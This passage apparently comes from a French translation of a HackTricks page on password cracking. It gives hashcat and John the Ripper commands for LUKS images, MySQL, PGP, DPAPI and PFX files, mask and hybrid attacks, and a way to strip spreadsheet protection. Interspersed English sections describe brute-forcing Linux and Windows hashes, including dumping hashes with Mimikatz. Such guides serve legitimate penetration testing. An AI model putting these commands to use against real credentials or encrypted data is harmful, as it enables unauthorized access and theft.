ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Méthode 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Mysql

Un autre tutoriel de BF Luks : http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Clé privée PGP/GPG

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

Clé maître DPAPI

Utilisez https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py puis john

Colonne protégée par mot de passe dans Open Office

Si vous avez un fichier xlsx avec une colonne protégée par un mot de passe, vous pouvez la déprotéger :

  • Téléchargez-le sur Google Drive et le mot de passe sera automatiquement supprimé
  • Pour le supprimer manuellement :
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

Certificats PFX

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Outils

Exemples de hash : https://openwall.info/wiki/john/sample-hashes

Identificateur de hash

hash-identifier
> <HASH>

Listes de mots

Outils de génération de listes de mots

  • kwprocessor: Générateur avancé de séquences de touches avec des caractères de base configurables, une disposition de touches et des itinéraires.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

Mutation de John

Lisez /etc/john/john.conf et configurez-le

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Attaques Hashcat

  • Attaque par liste de mots (-a 0) avec des règles

Hashcat est déjà livré avec un dossier contenant des règles mais vous pouvez trouver d'autres règles intéressantes ici.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
  • Attaque de combinaison de listes de mots

Il est possible de combiner 2 listes de mots en 1 avec hashcat.
Si la liste 1 contenait le mot "hello" et que la seconde contenait 2 lignes avec les mots "world" et "earth". Les mots helloworld et helloearth seront générés.

# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
  • Attaque par masque (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
  • Attaque par liste de mots + masque (-a 6) / Attaque par masque + liste de mots (-a 7)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Modes Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Brute Forcing

Introduction

Brute forcing is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. In the context of cracking Linux hashes from the /etc/shadow file, brute forcing involves generating potential passwords and hashing them using the same algorithm and salt as the original hash. If the generated hash matches the target hash, the password has been successfully cracked.

Tools

There are various tools available for brute forcing passwords, such as John the Ripper, Hashcat, and Hydra. These tools support different algorithms and techniques for password cracking, making them versatile and powerful options for cracking Linux hashes.

Methodology

  1. Obtain the hash from the /etc/shadow file.
  2. Identify the hashing algorithm and salt used.
  3. Use a brute force tool to generate potential passwords and hash them using the same algorithm and salt.
  4. Compare the generated hashes with the target hash.
  5. If a match is found, the password has been successfully cracked.

Considerations

  • Brute forcing can be time-consuming, especially for complex passwords.
  • It is essential to use a good wordlist and customize the brute force settings to increase the chances of success.
  • Brute forcing should be done responsibly and with proper authorization to avoid legal consequences.
500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Brute Forcing Windows Hashes

Introduction

When it comes to cracking Windows hashes, one of the most common methods is brute forcing. This technique involves trying all possible combinations of characters until the correct password is found. In this section, we will discuss the steps involved in brute forcing Windows hashes.

Tools Required

To perform a brute force attack on Windows hashes, you will need tools such as John the Ripper or Hashcat. These tools are capable of generating and testing a large number of password combinations in a short amount of time.

Methodology

  1. Capture the Hash: The first step is to obtain the Windows hash that you want to crack. This can be done by extracting the hash from the Windows SAM file or by using tools like Mimikatz to dump the hashes from memory.

  2. Choose a Wordlist: Before starting the brute force attack, you need to select a wordlist that will be used to generate password combinations. Wordlists can be obtained from various sources or created based on common passwords and patterns.

  3. Run the Brute Force Attack: Use a tool like John the Ripper or Hashcat to run the brute force attack against the captured hash. The tool will systematically try all possible password combinations until the correct one is found.

  4. Crack the Hash: Once the tool successfully cracks the hash, it will display the password that corresponds to the hash. This password can then be used to gain access to the Windows system.

Conclusion

Brute forcing Windows hashes can be a time-consuming process, especially if the password is complex. However, with the right tools and techniques, it is possible to crack Windows hashes and gain unauthorized access to a system. It is important to use these techniques responsibly and only on systems that you have permission to test.

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Brute-Force

Dictionary Attacks

A dictionary attack involves the use of a wordlist to attempt to crack passwords. These wordlists can be obtained from various sources and may contain commonly used passwords, dictionary words, or previously leaked passwords. Tools like hashcat and John the Ripper support dictionary attacks and can be highly effective if the password is weak or commonly used.

Rule-Based Attacks

Rule-based attacks involve the use of predefined rules to manipulate wordlists during the cracking process. These rules can modify words by adding numbers, special characters, or making other common password variations. Tools like hashcat allow users to create custom rule sets to increase the chances of cracking passwords.

Hybrid Attacks

Hybrid attacks combine dictionary attacks with brute-force attacks by adding specific patterns or characters to dictionary words. This approach can be useful when passwords have been slightly modified from dictionary words. Tools like hashcat support hybrid attacks and can be configured to try various combinations efficiently.

Mask Attacks

Mask attacks involve creating a mask that represents the password's potential format and characters. This method is useful when the password's structure is known, such as the length or specific characters used. Tools like hashcat allow users to define custom masks to target specific password patterns, making the cracking process more efficient.

900 | MD4                                              | Raw Hash
0 | MD5                                              | Raw Hash
5100 | Half MD5                                         | Raw Hash
100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
1400 | SHA-256                                          | Raw Hash
1700 | SHA-512                                          | Raw Hash
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

D'autres façons de soutenir HackTricks :


Utilisez Trickest pour construire et automatiser facilement des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}